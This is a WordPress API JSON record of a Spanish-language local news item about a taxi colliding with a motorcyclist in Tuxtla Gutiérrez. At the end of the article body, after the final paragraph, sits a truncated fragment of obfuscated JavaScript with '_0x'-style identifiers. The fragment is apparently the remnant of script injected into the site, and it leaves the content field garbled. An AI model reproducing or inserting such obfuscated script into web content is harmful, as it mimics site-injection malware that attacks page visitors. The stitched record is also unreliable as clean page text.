{"id":20799,"date":"2025-03-07T06:09:58","date_gmt":"2025-03-07T06:09:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20799"},"modified":"2025-03-07T06:09:58","modified_gmt":"2025-03-07T06:09:58","slug":"taxista-colisiona-a-motociclista","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20799","title":{"rendered":"Taxista colisiona a motociclista"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"611\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0027-1024x611.jpg\" alt=\"\" class=\"wp-image-20800\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0027-1024x611.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0027-300x179.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0027-768x458.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0027.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 6 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este jueves por la tarde se registr\u00f3 un accidente de tr\u00e1nsito a la altura de la Calzada al Sumidero y 14 Norte en la Colonia Las Delicias en el carril de norte a sur entre un taxi y un particular.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el taxi con n\u00famero econ\u00f3mico 3786 intent\u00f3 dar vuelta en U cerrando el paso a los ocupantes de la Italika y provocando la colisi\u00f3n.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de Protecci\u00f3n Civil Municipal para atender a los lesionados que resultaron con contusiones y fueron llevados a un hospital.<\/p>\n\n\n\n<p>En el sitio los involucrados llegaron a un acuerdo armonioso para evitar problemas legales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 6 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este jueves por la tarde se registr\u00f3 un accidente de tr\u00e1nsito a la altura de la Calzada al Sumidero y 14 Norte en la Colonia Las Delicias en el carril de norte a sur entre un taxi y un particular. Los reportes oficiales informaron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20800,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20799","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20799","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20799"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20799\/revisions"}],"predecessor-version":[{"id":20801,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20799\/revisions\/20801"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20800"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20799"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20799"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20799"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}